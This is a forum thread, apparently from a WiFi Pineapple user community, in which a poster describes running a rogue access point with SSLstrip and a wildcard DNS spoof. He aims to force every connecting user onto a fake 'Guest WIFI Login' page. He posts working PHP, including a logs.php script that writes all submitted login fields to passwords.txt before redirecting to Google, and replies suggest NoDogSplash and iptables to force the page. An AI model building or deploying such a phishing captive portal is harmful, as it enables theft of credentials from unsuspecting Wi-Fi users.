xARCHANGELSx Posted February 16, 2014 Posted February 16, 2014 (edited) I finally got my pineapple wifi up and running and its great. I tested SSLstrip and I love it, very nice script. Recently I downloaded a phishing zip off the website here, with the following contents:index.html facebook.html twitter.html peets.html error.php redirect.php test.php Now I haved used phishing pages before but the file I am most interested in is "peets.html" its basically a fake "Guest WIFI Login" for users. My only problem is this page does not come up every time you connect to the "Pineapple WIFI" when a browser is opened. Now what I want to achieve here, is to get this phishing page to load every time a user is connected to the wifi when he/she opens a url in the browser. Now my DNS SPOOF is updated in Configuration Settings>DNS Spoof tab: 172.16.42.1 * And my "index.php (Phishing)": <html> <head> <meta http-equiv="REFRESH" content=0;url=redirect.php"> </head> <body> </body> </html> Now in my "www" folder on the Pineapple server I have the following files and their contents: test.php <?php phpinfo(); ?> index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> redirect.php <?php $ref = $_SERVER['HTTP_REFERER']; require('index2.php'); ?> index2.php Now this is the phish page. This is the page I want to show every time a user is connected to the "Pineapple WIFI" when they first open the browser and enter a url. In order to use the wifi, they must login with a user name and password to use the WIFI. After they login then they will be redirected to "www.google.com" in the "logs.php" file. logs.php (To capture login/pass) <?php $yourpagesource = "https://www.google.com/"; $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable."=".$value); } fwrite($handle, "\r\n"); fclose($handle); header('Location: http://google.com/'); exit; ?> Any help would be awesome!!! Edited February 16, 2014 by winkillerx Quote
mreidiv Posted February 16, 2014 Posted February 16, 2014 (edited) look into no dog splash for the pineapple otherwise known as the captive portal infusion i believe you can redirect with iptables on a different port. Edited February 16, 2014 by mreidiv Quote
xARCHANGELSx Posted February 16, 2014 Author Posted February 16, 2014 (edited) Instead of using all the files. I just changed the "DNS SPOOF" index.php in "Configuration" to the main phish page, as seen below. Then I just made the login/pass forms record to a text file on the root pineapple server. Edited February 16, 2014 by winkillerx Quote
xARCHANGELSx Posted February 16, 2014 Author Posted February 16, 2014 I am now using NoDogSplash, just creating my own splash page :) Thanks mreidiv! Quote
Hammer09 Posted May 13, 2014 Posted May 13, 2014 I am now using NoDogSplash, just creating my own splash page :) Thanks mreidiv! Is it possible to use NoDogSplash with PHP as well ? I have editied the splash which works fine, but I'll be damned if I can get it talking to any backend systems. Do you have any examples you can post if you have a backend PHP ? Thanks. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.